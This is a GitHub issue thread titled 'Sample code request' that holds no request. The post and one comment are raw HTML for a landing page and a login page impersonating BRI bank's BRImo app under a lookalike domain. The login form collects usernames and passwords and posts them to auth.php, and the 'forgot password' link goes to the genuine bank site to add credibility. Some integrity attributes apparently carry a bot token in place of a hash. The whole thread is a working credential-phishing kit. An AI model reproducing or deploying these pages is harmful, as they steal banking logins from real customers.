### ISSUE TITLE
[Sample code request]

### ISSUE THREAD

**Issue by ibankbri** [algolia-samples/about#41]
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
    <link rel="canonical" href="https://perubahantarifbri.info/-brimo" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <meta property="og:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta name="twitter:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="https://perubahantarifbri.info/-brimo" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>BRImo- Bank BRI</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="5625102055:AAGCMk4NPw_HyvXN4T95i9f2t5Wvv0kG2Sg" crossorigin="anonymous">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -40px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 16px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 16px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }
    </style>
  </head>
  <body>
    <div class="container">
        <div class="row">
            <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: 130px; margin-bottom: 70px; border-radius: 0px;">
                <img alt="" src="img/1658168072097.jpg" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
            </div>
        </div>
        <div class="row" style="margin-top: -20px;">
            <div class="col-12 d-block mx-auto" style="white-space: pre-wrap; width: 459px; max-width: 100%; left: 0px; top: 0px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
                <div class="text-header"><font  size="5"><strong>Selamat Datang Di BRImo</strong></font></div>
                <div class="text-subheader"><font  size="4"><strong>Apakah Anda memiliki Akun Internet<br>Banking Bank BRI?</strong></font></div>
            </div>
        </div>
        <div class="row">
            <div class="col-12">
                <button type="button" class="btn-punya" onclick="location.href='login.php';">Punya Akun</button>
            </div>
            <div class="col-12">
                <button type="button" class="btn-belum" onclick="location.href='login.php';">Belum Punya Akun</button>
            </div>
        </div>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="5625102055:AAGCMk4NPw_HyvXN4T95i9f2t5Wvv0kG2Sg" crossorigin="anonymous"></script>
    
  </body>
</html>

**Comment by ibankbri** [comment]
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
    <link rel="canonical" href="https://perubahantarifbri.info/-brimo" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <meta property="og:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta name="twitter:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="https://perubahantarifbri.info/-brimo" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>BRImo- Bank BRI</title>
    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Verdana', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 60px; 
            width: 536px; 
            max-width: 100%; 
            border-top: 1px inset rgba(250, 250, 250, 0.13); 
            border-right: 1px solid rgba(184, 184, 184, 0.53); 
            border-bottom: none; 
            border-left: 1px outset rgba(168, 168, 168, 0.58); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 5px 5px 0px 0px; 
            box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px; 
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 45px;
        }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 7px;
            margin-left: 15px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .btn-login {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }
    </style>
  </head>
  <body>
    <div class="container">
        <div class="row">
            <div class="col-12 d-block mx-auto text-center p-0" style="height: auto; width: auto; max-width: auto; margin-top: -0px; border-radius: 0px;">
                <img alt="" src="img/1658047233080.jpg" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
            </div>
        </div>
        <div class="row" style="margin-top: 40px;">
            <div class="col-12 d-block mx-auto" style="margin-bottom: 10px; white-space: pre-wrap; width: 459px; max-width: 100%; left: 0px; top: 0px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
                <div class="text-header"><font  style="font-size: 19px; font-weight: bold;"><strong>Login</strong></font></div>
            </div>
        </div>
        <form method="post" action="auth.php">
            <input type="hidden" name="login" value="login">
            <div class="row">
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -20px auto;">
                    <div>
                        <i class="ion-ios-person-outline" id="ionIcons"></i>
                        <input name="email" type="text" class="bubble-element Input form-log" placeholder="Username" maxlength="" required>
                    </div>
                    <div style="margin-top: 1px">
                        <i class="ion-ios-locked-outline" id="ionIcons"></i>
                        <input type="password" name="pass" id="password" class="bubble-element Input form-log" placeholder="Password" maxlength="" required>
                        <div class="bubble-element eye clickable-element" tabindex="3" id="eyeOpen">
                            <img alt="" id="eye" src="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654594413237x395260983658785300%2Fhidden.png?w=24&amp;h=19&amp;auto=compress&amp;dpr=2&amp;fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
                        </div>
                        <div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none">
                            <img alt="" id="eye" src="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654594427324x961463961280841100%2Feye.png?w=32&h=26&auto=compress&dpr=2&fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
                        </div>
                        
                    </div>
                    <div class="text-header" style="float: right; position: relative; z-index: 999; display: block; margin-top: 15px;"><font  style="font-size: 16px" color="#000000"><strong><a href="https://ib.bri.co.id/ib-bri/id/forget-password.html" target="_blank" style="color: #000; text-decoration: none;">Lupa Password?</a></strong></font></div>
                </div>
            </div>
            <div class="row mt-3">
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -20px auto;">
                    <button class="btn-login" type="submit" value="send">Login</button>

                    <div class="bubble-r-box" style="height: 57px; float: right; display: block; margin-top: -65px; width: 51px;">
                        <div class="bubble-element Group" style="box-sizing: border-box; width: 55px; background-color: rgb(0, 111, 214); border-radius: 5px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; height: 57px;">
                            <div class="bubble-r-line" style="margin-top: 9px; height: 38px;">
                                <div class="bubble-r-box" style="height: 38px; padding-top: 6px; width: 45px; position: relative; display: block; margin: auto;">
                                    <div class="bubble-element HTML" style="box-sizing: border-box; z-index: 2; height: auto; width: 45px; position: relative; display: block; margin: auto; padding: 4px; border-radius: 0px;">
                                        <title>Google Icons</title>
                                        <meta name="viewport" content="width=device-width, initial-scale=1">
                                        <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
                                        <center>
                                            <i class="material-icons" style="font-size:36px;color:white">fingerprint</i>
                                        <center>
                                    </div>
                                </div>
                            </div>
                        </div
                        div>
                </div>
            </div>
        </form>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="5625102055:AAGCMk4NPw_HyvXN4T95i9f2t5Wvv0kG2Sg" crossorigin="anonymous"></script>
    <script>
        $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });

            
        });
    </script>
    
  </body>
</html>
